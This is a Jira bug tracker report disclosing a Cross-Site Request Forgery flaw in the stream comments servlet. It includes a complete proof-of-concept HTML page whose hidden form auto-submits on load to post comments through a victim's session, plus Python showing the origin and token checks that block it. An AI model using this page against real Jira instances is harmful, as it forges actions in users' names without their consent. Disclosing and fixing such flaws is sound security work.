Cross-Site Request Forgery

2011-05-30T19:04:38
ID ATLASSIAN:JRASERVER-24716
Type atlassian
Reporter jpcbl
Modified 2017-02-17T06:20:02

Description

Cross-Site Request Forgery

Security auditing tests performed on a locally running instance of Jira (Bug, Issue and Project Tracking Software) showed that the application is susceptible to Cross-Site Request Forgery attacks at this URL:

[/jira/plugins/servlet/streamscomments]

This vulnerability enables an attacker to post comments on an issue through the session of a valid user logged into the system. The comments are signed by the logged-in user and can be posted without that user's consent.

The first image below shows where the attack was performed, the second shows an example of the code used to trigger the Cross-Site Request Forgery, and the third shows the result of the attack:

!fontCode.png!

!pontoCsrfJira.png!

!xx_resultadoCSRF.png!

Furthermore, an example of the complete source code of the Cross-Site Request Forgery HTML file can be found below:

{noformat}
<html>
<head>
<TITLE>..:: TEMPEST XSRF ::..</TITLE>
</head>
<!-- the page submits the hidden form as soon as it loads -->
<body onload="document.formXSRF.submit()">

<center> .:: TEMPEST ::. <br> <br>
<img src="data:image/jpeg;base64,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" />
</center>

<!-- hidden iframe receives the response so the victim sees nothing -->
<div style="display:none"> <iframe name="framePost"> </iframe> </div>

<!-- cross-site POST to the comment servlet; the victim's browser attaches the Jira session cookie -->
<form name="formXSRF" action="http://jiradomain/jira/plugins/servlet/streamscomments" method="post" target="framePost">
  <input type='hidden' name='replyTo' value='http://jiradomain/jira/plugins/servlet/streamscomments/TEMPEST-8415'>
  <input type='hidden' name='comment' value='Teste de CSRF por Ederson'>
</form>

</body>
</html>
{noformat}
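The checks the comment servlet was missing, as an added illustration in Python (not Jira's own code): the request is accepted only when its Origin/Referer matches the site's own origin and the form carries the session's synchronizer token. The host "jiradomain" is the placeholder from the report; the session structure and the "csrf_token" field name are assumptions.

```python
import hmac
import secrets
from urllib.parse import urlsplit

# Origin of the Jira instance; "jiradomain" is the placeholder host from the report.
SITE_ORIGIN = "http://jiradomain"


def new_session():
    """Session record carrying a per-session synchronizer token (assumed layout)."""
    return {"user": "valid-user", "csrf_token": secrets.token_urlsafe(32)}


def csrf_check(session, headers, form):
    """Return (allowed, reason) for a state-changing POST such as
    /jira/plugins/servlet/streamscomments.

    1. Origin (or Referer as fallback) must equal the site's own origin; a
       form auto-submitted from another site carries that site's origin, or
       none at all, and both cases are rejected.
    2. The form must carry the token bound to the victim's session; a page
       on another origin cannot read it, so it cannot forge a match.
    """
    origin = headers.get("Origin") or headers.get("Referer")
    if not origin:
        return False, "missing Origin/Referer"
    parts = urlsplit(origin)
    sender = f"{parts.scheme}://{parts.netloc}"
    if sender != SITE_ORIGIN:
        return False, f"cross-site origin {sender}"
    token = form.get("csrf_token", "")
    if not hmac.compare_digest(token.encode(), session["csrf_token"].encode()):
        return False, "missing or invalid synchronizer token"
    return True, "ok"


# Constructed request modelled on the report's proof-of-concept form.
FORGED = {
    "headers": {"Origin": "http://attacker.example"},
    "form": {
        "replyTo": "http://jiradomain/jira/plugins/servlet/streamscomments/TEMPEST-8415",
        "comment": "Teste de CSRF por Ederson",
    },
}


def legitimate_request(session):
    """Same-origin post from the real comment form, carrying the session token."""
    form = dict(FORGED["form"], csrf_token=session["csrf_token"])
    return {"headers": {"Origin": SITE_ORIGIN}, "form": form}
```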